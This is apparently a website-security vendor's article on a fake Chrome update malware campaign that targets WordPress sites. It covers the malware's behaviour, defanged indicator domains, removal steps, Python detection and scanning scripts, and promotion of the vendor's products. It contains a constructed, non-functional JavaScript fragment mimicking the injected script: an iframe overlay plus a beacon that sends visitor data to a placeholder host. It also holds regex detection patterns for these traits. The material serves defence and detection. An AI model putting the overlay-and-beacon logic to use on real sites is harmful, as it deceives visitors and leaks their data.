Fake Browser Update Malware

Fake Browser Update Scam Infects WordPress Sites

Introduction

A new wave of JavaScript malware is targeting WordPress websites, compromising their security and tricking visitors with convincing fake browser update prompts. This sophisticated infection displays a fake Chrome update page (like the one shown below), aiming to deceive users into downloading malicious files.

Example of the fake Chrome update prompt injected by the malware.

This article, prepared by the MoeSec Website Security team, will help you understand, identify, and remove this threat, as well as explain how MoeSec’s security solutions and free WordPress plugin can help you stay protected.

1. What Is This Malware?

A Targeted, Deceptive Attack

This JavaScript malware is far more than a simple nuisance:

  • Selective Targeting:
    It only activates for users on specific operating systems (Windows) and browsers (Chrome).
  • Fake Update Windows:
    It injects a realistic-looking browser update prompt, urging users to “Update Chrome” via a button, leading to malware downloads.
  • Session Control:
    The script tracks visitors and limits how often the fake window is shown, making detection harder for website owners and keeping the infection stealthy for as long as possible.
A snippet of the injected malicious JavaScript code.

Some malicious domains associated with this fake browser update campaign:

allupdateservices[.]com

dragonshop[.]cloud

statswpmy[.]com

wppanel[.]icu

updatechrome[.]shop

trackingmyadsas[.]com

and many other malicious domains and variants are being discovered every day!

2. How Does It Work?

Let’s decode the malware’s behavior:

  • Checks Device and OS:
    The script first verifies if the visitor is using Windows and is not on a mobile device.
  • Cookie-Based Tracking:
    It counts how many times the user has seen the prompt, tracking visitors with cookies.
  • Injects Malicious Content:
    For targeted users, it overlays the page with an iframe showing a fake Chrome update page (see screenshot above).
  • Data Exfiltration:
    It sends user data (browser, OS, language, unique ID) to a remote server for tracking.
  • Limits Visibility:
    Each user will see the prompt a limited number of times, reducing suspicion and detection.
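
The behaviours above can be turned into a triage heuristic for scripts that reference no known domain. The following is an added example, not code from the malware or from MoeSec; the regex markers, the threshold and both sample snippets are assumptions constructed for illustration.

```python
import re

# Assumed textual markers for each behaviour listed above (hypothetical
# patterns, not taken from a real sample). A trait counts only when every
# pattern in its tuple is present; obfuscated scripts will evade this.
TRAITS = {
    "windows_check": (r"navigator\.(userAgent|platform)", r"\bWin(dows|32|64)\b"),
    "mobile_exclusion": (r"navigator\.userAgent", r"Mobi|Android|iPhone"),
    "cookie_counter": (r"document\.cookie\s*=", r"parseInt|Number\("),
    "iframe_overlay": (r"createElement\(\s*['\"]iframe['\"]", r"position[^;]{0,20}fixed|z-?index"),
    "beacon": (r"sendBeacon|XMLHttpRequest|\bfetch\s*\(", r"navigator\.language"),
}

def matched_traits(js):
    """Return the names of the behaviours whose markers all appear in js."""
    return [name for name, pats in TRAITS.items()
            if all(re.search(p, js, re.I) for p in pats)]

def triage(js, threshold=4):
    """Flag a script for manual review when most behaviours co-occur."""
    hits = matched_traits(js)
    return {"review": len(hits) >= threshold, "traits": hits}

# Constructed, non-functional fragments that mimic the described behaviour.
SUSPECT = """
if (/Windows/.test(navigator.userAgent) && !/Mobi|Android/.test(navigator.userAgent)) {
  var seen = parseInt(readCookie('v') || '0');   // readCookie is not defined here
  document.cookie = 'v=' + (seen + 1);
  var f = document.createElement('iframe'); f.style.position = 'fixed';
  f.src = 'https://example.invalid/';
  navigator.sendBeacon('https://example.invalid/t', navigator.language);
}
"""

# Constructed benign snippet: a cookie-consent banner reading the language.
BENIGN = """
var lang = navigator.language;
if (document.cookie.indexOf('consent=1') === -1) { showBanner(lang); }
"""

if __name__ == "__main__":
    print(triage(SUSPECT))
    print(triage(BENIGN))
```

A flagged script is a candidate for manual inspection, not a confirmed infection; legitimate consent or chat widgets can share individual traits.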

3. What’s the Goal?

Deception and Infection:
The primary purpose is to trick users into downloading and running malware under the guise of a browser update. This can lead to:

  • Ransomware or trojan infections
  • Credential theft / infostealers
  • Further compromise of the user’s system

Brand Damage & Blacklisting:
If your website is spreading fake updates, search engines and browsers may blacklist your domain, devastating your reputation and SEO.

4. How to Remove the Malware from Your WordPress Site

Step-by-Step Removal Guide

  1. Back Up Your Website:
    Always back up your files and database before making changes.

  2. Find the Malicious Code:

    • Search your themes, plugins, and uploads for suspicious <script> blocks, especially those referencing domains like allupdateservices[.]com or dragonshop[.]cloud.
    • Check files like header.php, footer.php, functions.php, and any custom JavaScript files.
    • Search your database for the above domains or code, as it’s usually injected into both files and the database.

  3. Remove the Script:

    • Delete all instances of the malicious JavaScript.
    • Make sure to remove any associated iframes or suspicious code.

  4. Update Everything:

    • Immediately update WordPress core, all themes, and plugins.
    • Remove any unused or suspicious plugins/themes.

  5. Change Passwords:

    • Update all admin, FTP, and database passwords.

  6. Scan and Monitor:

  7. Professional Help:
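
For step 2, a scan of the site files and a database dump for the domains listed earlier could look like this. It is an added example, not MoeSec's tooling; the scanned file extensions, the demo directory layout and the `dump.sql` name are assumptions, and the sample files are constructed.

```python
import re
import tempfile
from pathlib import Path

# Defanged indicators copied from the list earlier in this article.
IOCS = ["allupdateservices[.]com", "dragonshop[.]cloud", "statswpmy[.]com",
        "wppanel[.]icu", "updatechrome[.]shop", "trackingmyadsas[.]com"]
SCAN_EXT = {".php", ".js", ".html", ".htm", ".sql"}  # assumed set of file types

def refang(ioc):
    """Turn a defanged indicator back into the form found in infected code."""
    return ioc.replace("[.]", ".")

# One case-insensitive pattern covering every listed domain.
PATTERN = re.compile("|".join(re.escape(refang(i)) for i in IOCS), re.I)

def scan_tree(root):
    """Return sorted (relative path, line number, domain) hits under root."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXT:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for n, line in enumerate(text.splitlines(), 1):
            for m in PATTERN.finditer(line):
                hits.append((path.relative_to(root).as_posix(), n,
                             m.group(0).lower()))
    return sorted(hits)

def build_demo_site(root):
    """Create a constructed mini WordPress tree plus a database dump."""
    root = Path(root)
    theme = root / "wp-content/themes/demo"
    theme.mkdir(parents=True)
    (theme / "header.php").write_text(
        f"<?php wp_head(); ?>\n<script src='//{refang(IOCS[2])}/x.js'></script>\n")
    (theme / "functions.php").write_text("<?php // clean file\n")
    (root / "dump.sql").write_text(
        f"INSERT INTO wp_options VALUES (1,'widget_text',"
        f"'<script src=//{refang(IOCS[3]).upper()}/a.js>');\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        for hit in scan_tree(build_demo_site(d)):
            print(hit)
```

Run `scan_tree` against a copy of the site and the dump taken in step 1, and review each hit by hand before deleting anything; new domains and variants will not match this list.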

5. How MoeSec Can Help

MoeSec Website Security Platform

Designed for complete website protection, MoeSec offers:

  • Deep Malware Scanning:
    Detects hidden scripts, backdoors, and known malware patterns.
  • Automated Cleanup:
    Removes malware, including fake update scripts, with a single click, combined with unlimited manual cleanup requests and support from our certified security experts.
  • Real-Time Monitoring:
    Detects suspicious changes instantly and alerts you.
  • Expert Remediation:
    Certified security professionals are available for complex cases.
  • The platform also offers: Website Firewall, Backups, Trust Seal, Vulnerability Scanner and much more!

Why MoeSec?
The MoeSec platform is ideal for website owners who need comprehensive protection and fast incident response, far beyond what any free plugin can provide.

MoeSec Free WordPress Security Plugin

A robust, free plugin to harden your WordPress security:

  • Scans for common malware and file changes
  • Provides a security dashboard and alerts
  • Offers hardening tips and easy fixes
  • Offers login protection, 2FA and brute-force protection, firewall, backups, integrity checks and much more!

Conclusion

If your website is showing fake browser update prompts, act now to protect your visitors and your reputation.
Install the MoeSec Free WordPress Security Plugin for essential protection, and consider the MoeSec Website Security Platform for professional security, monitoring, and malware removal.

Stay safe, don’t let your site be a conduit for the next wave of online scams! Visit MoeSec.com for more security tips and solutions.
